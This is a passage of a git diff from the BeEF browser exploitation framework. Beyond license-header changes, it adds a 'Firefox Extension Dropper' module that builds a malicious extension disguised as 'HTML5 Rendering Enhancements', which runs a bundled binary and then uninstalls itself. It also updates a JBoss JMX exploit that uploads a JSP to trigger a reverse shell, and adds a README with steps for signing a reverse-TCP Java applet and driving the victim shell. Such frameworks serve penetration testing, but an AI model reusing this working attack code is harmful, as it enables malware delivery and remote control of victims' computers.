+        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+        },
+		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end
diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js
index 1d64217ff..3ac086fad 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/command.js
+++ b/modules/exploits/jboss_jmx_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * Jboss 6.0.0M1 JMX Upload Exploit
  * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
@@ -43,11 +34,11 @@ beef.execute(function() {
     uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
 
     /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
-	beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
-         if(response.status_code == "success"){
+	beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){
+         if(response.status_code == 200){
              function triggerReverseConn(){
-                beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
-                    if(response.status_code == "success"){
+                beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){
+                    if(response.status_code == 200){
                          if(payloadType == "reverse"){
                              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
                          }else{
@@ -64,4 +55,4 @@ beef.execute(function() {
              beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
          }
     });
-});
\ No newline at end of file
+});
diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
index 880a582a3..144002fbd 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml
+++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -23,3 +13,4 @@ beef:
             authors: ["antisnatchor", "l33tb0y"]
             target:
                 working: ["ALL"]
+                not_working: "O"
diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb
index a5345cdb6..17a537ac0 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/module.rb
+++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Jboss_jmx_upload_exploit < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index c6eeac3d6..838cddb0d 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
index 0a4d45a45..d2caf410e 100755
--- a/modules/exploits/local_host/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
index c8dd70d8c..26f93d7c0 100755
--- a/modules/exploits/local_host/activex_command_execution/module.rb
+++ b/modules/exploits/local_host/activex_command_execution/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Activex_command_execution < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/firefox_extension_dropper/command.js b/modules/exploits/local_host/firefox_extension_dropper/command.js
new file mode 100644
index 000000000..4dae24103
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/command.js
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var xpi_name = '<%= @xpi_name %>';
+    var domain = '<%= @domain %>';
+    var ff_extension = '/' + xpi_name + '.xpi';
+
+    if(beef.browser.isFF()){
+        var id = beef.dom.generateID();
+        var pid = beef.dom.generateID();
+        var zztop = beef.dom.getHighestZindex()+1;
+        var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+        var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+        var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+        $j('body').append(el);
+        var hid = '#'+id;
+        var hpid = '#'+pid;
+        $j(hid).append(elp);
+        $j(hpid).html("<%= @notification_text %> ");
+        $j(hid).append(elr);
+        $j(hid).click(function() {
+            $j(this).slideUp(300,function() {
+                $j(this).remove();
+            });
+            //window.location.href = ff_extension;
+            window.open(ff_extension);
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+        });
+        $j(hid).css('cursor','pointer');
+        $j(hid).slideDown(300,function() {
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+        });
+    }
+});
diff --git a/modules/exploits/local_host/firefox_extension_dropper/config.yaml b/modules/exploits/local_host/firefox_extension_dropper/config.yaml
new file mode 100644
index 000000000..ea46d4cf2
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        firefox_extension_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Firefox Extension Dropper"
+            description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). 

 The extension is based on the original work from Michael Schierl and his Metasploit module."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt
new file mode 100644
index 000000000..89e9322f9
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt
@@ -0,0 +1,2 @@
+Place in this directory the binary you want to drop and execute through the Firefox extension.
+Make sure to have just ONE file in this directory (other than this readme.txt).
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js
new file mode 100644
index 000000000..dcaf24fa6
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js
@@ -0,0 +1,30 @@
+
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
+  file.append(xpi_guid);
+  file.append(payload_name);
+  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("TmpD", Components.interfaces.nsIFile);
+  tmp.append(payload_name);
+  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+  file.copyTo(tmp.parent, tmp.leafName);
+    
+  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+  process.init(tmp);
+  process.run(false,[],0);
+      
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      }
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
new file mode 100644
index 000000000..9aa47d25d
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
@@ -0,0 +1 @@
+This is a temp directory where the Firefox extension will be built.
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
new file mode 100644
index 000000000..2864216f5
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
@@ -0,0 +1,2 @@
+content	{861fb387-92ce-bb0a-cb48-4b923dbc292b}	./
+overlay	chrome://browser/content/browser.xul	chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf
new file mode 100644
index 000000000..0813095d0
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf
@@ -0,0 +1,24 @@
+
+
+  
+    {861fb387-92ce-bb0a-cb48-4b923dbc292b}
+    __extension_name_placeholder__
+    1.0
+    true
+    true
+    
+      
+        toolkit@mozilla.org
+        1.0
+        *
+      
+    
+    
+      
+        {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
+        1.0
+        *
+      
+    
+    
+
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul
new file mode 100644
index 000000000..91ca363e4
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul
@@ -0,0 +1,5 @@
+
+
+  
+
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/module.rb b/modules/exploits/local_host/firefox_extension_dropper/module.rb
new file mode 100644
index 000000000..83a92af27
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/module.rb
@@ -0,0 +1,96 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Firefox_extension_dropper < BeEF::Core::Command
+
+  class Bind_extension < BeEF::Core::Router::Router
+    before do
+      headers 'Content-Type' => 'application/x-xpinstall',
+              'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0'
+    end
+
+    get '/' do
+      response['Content-Type'] = "application/x-xpinstall"
+      extension_path = settings.extension_path
+      print_info "Serving malicious Firefox Extension Dropper: #{extension_path}"
+      send_file "#{extension_path}",
+                :type => 'application/x-xpinstall',
+                :disposition => 'inline'
+    end
+  end
+
+  def pre_send
+
+    # gets the value configured in the module configuration by the user
+    @datastore.each do |input|
+       if input['name'] == "extension_name"
+          @extension_name = input['value']
+       end
+       if input['name'] == "xpi_name"
+          @xpi_name = input['value']
+       end
+    end
+
+    mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
+    extension_path = mod_path + "/extension"
+
+    # clean the build directory
+    FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
+
+    # retrieve the name of the dropper binary
+    Dir.foreach("#{mod_path}/dropper") do |item|
+      if item != "readme.txt" && item != "." && item != ".."
+        @dropper = item
+        print_info "Using dropper: '#{mod_path}/dropper/#{@dropper}'"
+      end
+    end
+    if @dropper.nil?
+      print_error "No dropper found in '#{mod_path}/dropper'"
+      return
+    end
+
+    # copy in the build directory necessary file, substituting placeholders
+    File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
+    File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}
+    File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
+    File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
+    FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}"
+
+    extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper]
+
+    # create the XPI extension container
+    xpi = "#{extension_path}/#{@xpi_name}.xpi"
+    if File.exist?(xpi)
+       File.delete(xpi)
+    end
+    Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
+      extension_content.each do |filename|
+        xpi.add(filename, "#{extension_path}/build/#{filename}")
+      end
+    end
+
+    # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+    bind_extension = Firefox_extension_dropper::Bind_extension
+    bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper/extension/#{@xpi_name}.xpi"
+    BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
+    BeEF::Core::Server.instance.remap
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
+        {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
+        {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beefdomain'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end
diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
deleted file mode 100644
index 8959c4ed9..000000000
Binary files a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar and /dev/null differ
diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
deleted file mode 100644
index 2c38c932d..000000000
Binary files a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar and /dev/null differ
diff --git a/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar b/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
new file mode 100644
index 000000000..30e058e87
Binary files /dev/null and b/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar differ
diff --git a/modules/exploits/local_host/java_payload/README.txt b/modules/exploits/local_host/java_payload/README.txt
new file mode 100644
index 000000000..df644a52d
--- /dev/null
+++ b/modules/exploits/local_host/java_payload/README.txt
@@ -0,0 +1,50 @@
+--- How to use this module ---
+The following is how you compile the JavaPayload handlers :
+
+$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
+$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
+$cd .. && ant compile && ant jar
+$cd build/bin
+$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
+
+At this point you have the applet ready to go, with a reverseTCP handler:
+Applet_ReverseTCP.jar
+Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
+with Java 6 to run it on those versions too - SUGGESTED :-).
+
+At this stage you need to sign the applet.
+The following is to create a self-signed certificate and then sign it.
+Obviously if you have a valid code signing certificate, even better ;)
+
+keytool -keystore tmp -genkey
+jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
+
+Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
+
+You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
+java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+
+Now launch the BeEF module.
+If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
+antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+! help
+help: show information about commands.
+  Usage: help [command]
+
+Supported commands:
+    help   - show this help
+    info   - list system properties
+    pwd    - show current directory
+    cd     - change directory
+    ls     - list directory
+    exec   - execute native command
+    cat    - show text file
+    wget   - download file
+    telnet - create TCP connection
+    paste  - create text file
+    jobs   - list or continue jobs
+    exit   - Exit JSh
+
+When inside an interactive command, enter ~. on a new
+line to exit from that command. Enter ~& to background the command.
+Enter ~~ to start a line with a ~ character
\ No newline at end of file
diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
index 8ebcfcc28..fc2665027 100755
--- a/modules/exploits/local_host/java_payload/command.js
+++ b/modules/exploits/local_host/java_payload/command.js
@@ -1,24 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var conn = '<%= @conn %>';
     var cbHost = '<%= @cbHost %>';
     var cbPort = '<%= @cbPort %>';
-    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
 
diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
index 651dedb7b..5aaa61d93 100755
--- a/modules/exploits/local_host/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,5 +12,4 @@ beef:
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported."
             authors: ["antisnatchor"]
             target:
-                not_working: ["FF"]
                 user_notify: ["All"]
diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
index 2f3380bc7..97caa35d4 100755
--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -1,22 +1,12 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
